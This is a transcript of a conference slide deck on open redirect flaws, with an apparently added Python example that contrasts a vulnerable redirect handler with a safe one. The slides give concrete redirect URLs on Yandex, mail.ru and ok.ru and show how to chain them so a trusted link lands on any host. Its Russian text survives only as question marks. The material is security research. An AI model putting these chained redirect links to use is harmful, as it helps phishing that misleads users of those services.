Open Redirects - PowerPoint PPT Presentation

Mikhail Bolshov at PHDays V – PowerPoint PPT presentation

Transcript and Presenter's Notes

1
?? ???? ????? ??????????
2
about me
  • anonimous@localhost whoami
  • BigBear
  • anonimous@localhost id
  • uid=1020(pentest) gid=100(antichat) groups=101(rdot)
  • @i_BigBear

3
Open Redirects
  • OWASP Description
  • An open redirect is an application that takes a
    parameter and redirects a user to the parameter
    value without any validation.
  • This vulnerability is used in phishing attacks to
    get users to visit malicious sites without
    realizing it.

4
Open Redirects
5
Open Redirects
6
Open Redirects
Client
Server 1
1.php?redir=http://server2
header("Location: http://server2/")
Server 2
7
Open Redirects
Client
Server 1
1.php?redir=http://anyhost
header("Location: http://anyhost/")
Server 2
8
Open Redirects
9
Open Redirects
@Black2Fan
10
Open Redirects
Client
Server 1
1.php?redir=http://server2
header("Location: http://server2/")
Server 2
any host
header("Location: http://anyhost/")
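The redirect handler in the diagrams above, written out as an added Python example (not code from the deck): the unvalidated version that honours any redir value, next to one that only emits Location targets on its own origin or an explicitly allowed host. Origin, host names and fallback path are constructed for the example. An allowlist of other hosts only helps if none of those hosts is itself an open redirector, which is exactly the chain the deck goes on to show.

```python
from urllib.parse import urlsplit, urljoin

# Constructed for this example: the origin whose Location header we emit,
# the only hosts we agree to send users to, and a fixed fallback page.
OWN_ORIGIN = "https://mail.example.test"
ALLOWED_HOSTS = {"mail.example.test", "docs.example.test"}
DEFAULT_PATH = "/inbox"


def vulnerable_location(redir: str) -> str:
    """Slides 6-7: header("Location: " . $_GET['redir']) with no validation."""
    return redir


def safe_location(redir: str) -> str:
    """Return a Location value that stays on OWN_ORIGIN or an allowed host.

    Anything else (foreign hosts, scheme-relative '//host', non-http
    schemes, userinfo such as 'https://good@evil') collapses to DEFAULT_PATH.
    """
    parts = urlsplit(redir)
    # Case 1: a plain relative path. Require exactly one leading slash,
    # because browsers treat '//host' and '/\\host' as scheme-relative.
    if (not parts.scheme and not parts.netloc
            and redir.startswith("/") and redir[1:2] not in ("/", "\\")):
        return urljoin(OWN_ORIGIN, redir)
    # Case 2: an absolute http(s) URL whose parsed hostname (not the raw
    # netloc, so userinfo and port cannot fool the check) is allowed.
    if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS:
        return redir
    # Case 3: everything else goes to a fixed in-application page.
    return urljoin(OWN_ORIGIN, DEFAULT_PATH)
```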
11
Open Redirects
http://yandex.ru/clck/jsredir?from=yandex.ru%3Byandsearch%3Bweb%3B%3B&text=&etext=635.A3K9EhGzrzdN
http://yabs.yandex.ru/count/RhnEbYFY6Pm4000
http://awaps.yandex.net/1/c1/tx21lszVf7wve-k2Rifa_A_.swf?click_num=0
http://an.yandex.ru/count/asfa3573vsvsTTvssb9dYYe
12
Open Redirects
13
Open Redirects
https://mail.yandex.ru/?retpath=https://mail.yandex.ru/neo2/inbox
https://mail.yandex.ru/?retpath=https://google.com
14
Open Redirects
https://mail.yandex.ru/?retpath=https://an.yandex.ru/count/JcnAPGOmkJy40000Zh_yYqi5XPvP5vK1cm5kGxS298Yuvo_10OczVX8D0fYihxs-dWQThty64fQpheHU0Rhm6mcCwDvLyGMc6ugmgHN00Rs_yYMp0Qe1fQc4nmEyg9iX0v6rhcBQ1u
15
Open Redirects
Why ???
16
Open Redirects
https://auth.mail.ru/cgi-bin/auth?FakeAuthPage=&Page=http://deti.mail.ru/
https://auth.mail.ru/cgi-bin/auth?FakeAuthPage=&Page=http://google.com/
17
Open Redirects
?????????????? -)
Step 1 ???? ?????????
Step 2 ???? ????????? ?? ???
18
Open Redirects
?????????????? -)
http://ok.ru/dk?cmd=logExternal&st.cmd=logExternal&st.name=62670701063111&st.link=http://www.yandex.ru/
19
Open Redirects
?????????????? -)
http://odnoklassniki.mail.ru
Step 3 ?????????
https://auth.mail.ru/cgi-bin/auth?FakeAuthPage=&Page=http://odnoklassniki.mail.ru/
20
Open Redirects
?page=http://odnoklassniki%3Fmany-many-params
auth.mail.ru
Client
header("Location: http://odnoklassniki%3Fmany-many-params/")
Odnoklassniki.ru
any host
header("Location: http://anyhost/")
21
Open Redirects
https://auth.mail.ru/cgi-bin/auth?FakeAuthPage=&Page=http://odnoklassniki.mail.ru/dk?cmd=logExternal&st.cmd=logExternal&st.name=62670701063111&st.link=http://www.yandex.ru/
22
Open Redirects
https://auth.mail.ru/cgi-bin/auth?FakeAuthPage=&Page=http://odnoklassniki.mail.ru/dk?cmd=logExternal&st.cmd=logExternal&st.name=62670701063111&st.link=http://anyhost/
23
Open Redirects
24
Open Redirects
https://auth.mail.ru/cgi-bin/auth?FakeAuthPage=&Page=http://odnoklassniki.mail.ru/dk?cmd=logExternal&st.cmd=logExternal&st.name=62670701063111&st.link=http://www.yandex.ru/
https://auth.mail.ru/cgi-bin/auth?FakeAuthPage=&Page=http://odnoklassniki.mail.ru/dk?cmd=logExternal&st.cmd=logExternal&st.name=62670701063111&st.link=http://any.yandex.ru/
25
Open Redirects
https://auth.mail.ru/cgi-bin/auth?FakeAuthPage=&Page=http://odnoklassniki.mail.ru/dk?cmd=logExternal&st.cmd=logExternal&st.name=62670701063111&st.link=http://an.yandex.ru/count/JcnAPGOmkJy40000Zh_yYqi5XPvP5vK1cm5kGxS298Yuvo_10OczVX8D0fYihxs-dWQThty64fQpheHU0Rhm6mcCwDvLyGMc6ugmgHN00Rs_yYMp0Qe1fQc4nmEyg9iX0v6rhcBQ1u--x8jD1v-uiY4R3fE539bYGeoGdoIWaDGmhv2V9AUEcQYmG5bp1wJ00000J0MkyUW8iyWCm0m5iB2-9f03iG6oYbEvhty64hl-rfaBeJVud071__________yFVnO0
26
Open Redirects
https://auth.mail.ru/cgi-bin/auth?FakeAuthPage=&Page=http://odnoklassniki.mail.ru/dk?cmd=logExternal&st.cmd=logExternal&st.name=62670701063111&st.link=http://an.yandex.ru2f636f756e742f4a636e4150474f6d6b7957436d306d356942322d396630336947366f596245766874793634686c2d72666142654a5675643037315f5f5f5f5f5f5f5f5f5f7946566e4f30
27
Open Redirects
?????????????? -)
Client
odnoklassniki.mail.ru
auth.mail.ru
ok.ru
an.yandex.ru
anyhost
28
??????? ?? ???????? ! @i_BigBear